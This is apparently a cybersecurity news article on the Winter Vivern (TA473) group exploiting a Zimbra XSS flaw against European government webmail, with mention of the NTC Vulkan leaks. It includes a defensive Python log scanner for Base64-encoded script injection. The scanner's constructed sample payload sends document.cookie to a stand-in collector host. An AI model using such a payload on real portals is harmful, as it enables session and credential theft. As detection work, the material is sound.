Winter Vivern: The Latest Cyber Threat Targeting European Governments

April 1, 2023
Nextdoorsec-course

Winter Vivern, an advanced persistent threat (APT) actor, has expanded its cyber espionage campaign by targeting officials in Europe and the U.S. This campaign involves leveraging an unpatched Zimbra vulnerability in publicly facing webmail portals, allowing the group to access the email mailboxes of government entities in Europe.

Proofpoint, an enterprise security firm, is tracking the activity under its own name, TA473 (UAC-0114). The firm describes TA473 as an adversarial crew whose operations align with Russian and Belarusian geopolitical objectives.

Despite its lack of sophistication, the group has been linked to recent attacks targeting state authorities of Ukraine and Poland, government officials in India, Lithuania, Slovakia, and even the Vatican.

The group uses scanning tools such as Acunetix to find unpatched webmail portals belonging to targeted companies. They then send phishing emails under the guise of benign government agencies, with messages containing booby-trapped URLs. 

These URLs exploit the cross-site scripting (XSS) vulnerability in Zimbra to execute custom Base64-encoded JavaScript payloads inside victims’ webmail portals, allowing the group to exfiltrate usernames, passwords, and access tokens.

Each JavaScript payload is tailored to the targeted webmail portal, indicating that the group is willing to invest time and resources to reduce the likelihood of detection. According to Proofpoint, TA473’s persistent approach to vulnerability scanning and exploitation of unpatched vulnerabilities is a key factor in its success.
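One way a defender can hunt for the pattern described above (booby-trapped URLs carrying Base64-encoded JavaScript into a webmail portal) is to decode Base64-looking query parameters in the portal's access logs and look for script indicators in the decoded text. The following is an added example written for this page; it is not code from the article, from Proofpoint, or from Zimbra. The log lines, IP addresses, host names and the `/webmail/` path are constructed, and the indicator list is an assumption a team would tune to its own environment.

```python
import base64
import re
from urllib.parse import quote, unquote, urlsplit

# Combined Log Format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Assumed indicators of script injection; tune to the portal's normal traffic.
JS_INDICATORS = re.compile(
    r"<script|javascript:|\beval\(|\batob\(|document\.cookie|\bfetch\(|XMLHttpRequest", re.I
)

# Runs of Base64 alphabet (standard or URL-safe) long enough to be worth decoding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/_-]{16,}={0,2}")


def b64(text):
    """Standard Base64 of a UTF-8 string (used only to build the constructed sample)."""
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


def decode_candidates(value):
    """Return the UTF-8 text of every Base64-looking run inside value that decodes cleanly."""
    found = []
    for match in B64_TOKEN.finditer(value):
        token = match.group(0)
        padded = token + "=" * (-len(token) % 4)  # tolerate stripped padding
        raw = None
        try:
            raw = base64.b64decode(padded, validate=True)  # strict: standard alphabet only
        except ValueError:
            try:
                raw = base64.urlsafe_b64decode(padded)  # fall back to the URL-safe alphabet
            except ValueError:
                continue
        try:
            found.append(raw.decode("utf-8"))  # binary blobs (session ids, images) are skipped
        except UnicodeDecodeError:
            pass
    return found


def parse_query(target):
    """Split the query string into (key, value) pairs without turning '+' into spaces."""
    pairs = []
    for part in urlsplit(target).query.split("&"):
        if part:
            key, _, val = part.partition("=")
            pairs.append((unquote(key), unquote(val)))
    return pairs


def inspect_request(line):
    """Return a finding dict for a log line whose query carries script indicators, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    for key, value in parse_query(m["target"]):
        # Check the raw parameter first, then every Base64 layer it may be hiding.
        for text in [value] + decode_candidates(value):
            hit = JS_INDICATORS.search(text)
            if hit:
                findings.append({"param": key, "indicator": hit.group(0), "decoded": text is not value})
                break
    if not findings:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "path": urlsplit(m["target"]).path,
            "referer": m["referer"], "findings": findings}


def scan_log(text):
    """Run inspect_request over every line and keep the hits."""
    return [hit for hit in (inspect_request(line) for line in text.splitlines()) if hit]


# Constructed sample traffic: two benign requests, one Base64-wrapped script, one plain script.
SAMPLE_PAYLOAD = "<script>new Image().src='https://collector.example.invalid/?c='+document.cookie</script>"
SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [01/Apr/2023:10:01:02 +0000] "GET /webmail/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Apr/2023:10:01:09 +0000] "GET /webmail/?q=quarterly%20report HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [01/Apr/2023:10:02:41 +0000] "GET /webmail/?msg=' + quote(b64(SAMPLE_PAYLOAD), safe="")
    + ' HTTP/1.1" 200 2048 "https://lure.example.invalid/" "Mozilla/5.0"',
    '198.51.100.23 - - [01/Apr/2023:10:03:15 +0000] "GET /webmail/?msg=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
])

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["path"], hit["findings"])
```

Checking the raw parameter before the decoded layers matters because the same indicator list catches both unencoded and Base64-wrapped scripts, and the `decoded` flag tells an analyst which form was used. Requests that decode to non-UTF-8 bytes (session tokens, image data) are ignored, which keeps the false-positive rate manageable on a busy portal.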

These findings coincide with revelations that at least three Russian intelligence agencies (FSB, GRU, and SVR) use software and hacking tools designed by a Moscow-based IT contractor called NTC Vulkan. 

This includes frameworks like Scan, Amesit, and Krystal-2B, which simulate coordinated IO/OT attacks against rail and pipeline control systems.

Mandiant, a threat intelligence firm, notes that the projects contracted from NTC Vulkan provide insight into how much Russian intelligence services are investing in capabilities that let them operate more efficiently at the beginning of the attack lifecycle, a part of their operations that is usually hidden from view.

Saher Mahmood

Author

Saher is a cybersecurity researcher with a passion for innovative technology and AI. She explores the intersection of AI and cybersecurity to stay ahead of evolving threats.
